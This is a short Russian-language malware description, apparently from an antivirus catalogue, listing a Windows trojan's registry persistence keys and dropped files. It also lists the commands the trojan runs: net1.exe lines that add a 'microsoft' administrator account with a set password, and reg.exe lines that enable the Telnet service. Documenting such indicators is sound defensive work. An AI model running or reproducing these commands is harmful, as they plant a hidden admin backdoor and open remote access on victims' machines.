Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Winhost' = '<SYSTEM32>\server.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Microsoft' = '<SYSTEM32>\ipjuego.exe'
- [<HKLM>\SYSTEM\ControlSet001\Services\TlntSvr] 'Start' = '00000002' (служба Telnet, TlntSvr, переводится в режим автоматического запуска)
- <SYSTEM32>\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Winhost /t REG_SZ /d <SYSTEM32>\server.exe /f
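- <SYSTEM32>\net1.exe user microsoft micro /add (создаётся локальная учётная запись «microsoft»)
- <SYSTEM32>\net1.exe localgroup "Administradores" microsoft /add (эта учётная запись добавляется в группу администраторов; имя группы соответствует испано- или португалоязычной локализации Windows)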
- <SYSTEM32>\cmd.exe /c ""%WINDIR%\Temp\a00838.bat" <Полный путь к вирусу>"
- <SYSTEM32>\reg.exe ADD HKLM\SYSTEM\CurrentControlSet\Services\TlntSvr /v Start /t REG_DWORD /d 2 /f
- <SYSTEM32>\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d <SYSTEM32>\ipjuego.exe /f
- <SYSTEM32>\Server.exe
- %WINDIR%\Temp\a00838.bat
- <LS_APPDATA>\Server.exe
- %WINDIR%\Temp\a00838.bat